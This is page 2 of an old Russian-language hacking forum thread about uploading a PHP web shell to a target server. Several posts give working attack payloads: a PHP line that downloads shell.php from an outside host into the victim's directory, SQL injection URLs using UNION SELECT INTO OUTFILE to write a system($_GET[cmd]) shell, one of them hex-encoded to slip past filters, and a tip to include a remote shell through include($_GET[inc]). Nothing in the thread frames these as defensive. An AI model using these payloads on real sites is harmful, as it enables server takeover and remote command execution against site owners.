ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Заливка php шелла
   
Закрытая тема
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 08.01.2008, 21:26
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
Отправить сообщение для Basurman с помощью ICQ
По умолчанию
Цитата:
Сообщение от Spyder  
file_priv = 1
Брат-наркоман?
 

  #12  
Старый 08.01.2008, 21:27
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию
1) Ой, только не надо поучать Spyder-a
2) ty13r задал вопрос, на который надо отвечать,
а не оффтопить...
 

  #13  
Старый 08.01.2008, 21:33
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию
<? copy("http://sait.narod.ru/shell.php","./shellcheg.php"); ?>
это лучше захексить

запускаешь скрипт шелл копируется из указанного пути (http://sait.narod.ru/shell.php) в папку со скриптом подименем shellcheg.php
__________________
Карфаген должен быть разрушен...
 

  #14  
Старый 08.01.2008, 21:34
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию
Нет вы извините конечно за оффтоп, но кто такой Spyder, чтобы ему уже нечему было учиться????
Evil вот и не оффтопь, раз такой умный
Scipio
зачётный способ как-то не догадался)))
Последний раз редактировалось Termin@L; 08.01.2008 в 21:36..
 

  #15  
Старый 08.01.2008, 21:40
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию
Посмотри на свою репу, и на репу Spyder-a... А что касается поставленного вопроса: проинклудь шелл и все.
 

  #16  
Старый 08.01.2008, 21:42
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию
если уж на то пошло, то
Цитата:
http://site.com/bug.php?&id=-1'+union+select+'<?system($_GET[cmd]);?>',2+into+outfile+'/www/site/shell.php'/*
то есть не пользуйся пробелами в <?system($_GET[cmd]);?> .. далее, можешь внутри система заинеодить в бэйс. у меня много раз не пропускало именно изза $
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
Последний раз редактировалось blackybr; 08.01.2008 в 21:58..
 

  #17  
Старый 08.01.2008, 21:43
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию
Такс, давай те по порядку, а то я щас с ума сойду
ТС говорит что файл создаётся (!!!), т е права на создание файлов есть, из этого следует вопрос нахуя нужен вот этот пост ------> https://forum.antichat.ru/showpost.php?p=553675&postcount=6 ?????
далее
Цитата:
Spyder
это не всегда удобно так как пост запросы сразу отпадают, а соответственно и заливка файлов на сервер
это кто тебе такую чушь сказал? тебя обманули жестоко
Ты хочешь скать есть выполнить код <?include($_GET[inc])?>
и проинклудить удалённый шелл который работает постом и естественно файлы льются тоже с использованием метода пост, то работат ничего не будет? Ты серьёзно так думаешь?

blackybr: в случае allow_url_fopen будут


Блеки, вообще то
http://site.com/bug.php?&id=-1'+union+select+'<?system($_GET[cmd]);?>',2+into+outfile+'/www/site/shell.php'/*
<?system($_GET[cmd]);?> - надо в кавычки обрамлять



blackybr: Извини ламера DDDD

хватет мои посты редактировать



blackybr: старею )
Последний раз редактировалось blackybr; 08.01.2008 в 21:59..
 

  #18  
Старый 08.01.2008, 21:50
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию
тогда уж
http://site.com/bug.php?&id=-1'+union+select+0x3C3F73797374656D28245F4745545B22 636D64225D293B3F3E,2+into+outfile+'/www/site/shell.php'/*

а вобще думаю мой вариант наиболее оптимальный (хотя как пхп настроен)
__________________
Карфаген должен быть разрушен...
 
Закрытая тема
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Заливка шелла в Joomla AkyHa_MaTaTa Сценарии/CMF/СMS 29 12.01.2010 17:42
Что такое Php? PAPA212 Болталка 13 28.12.2007 20:44
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ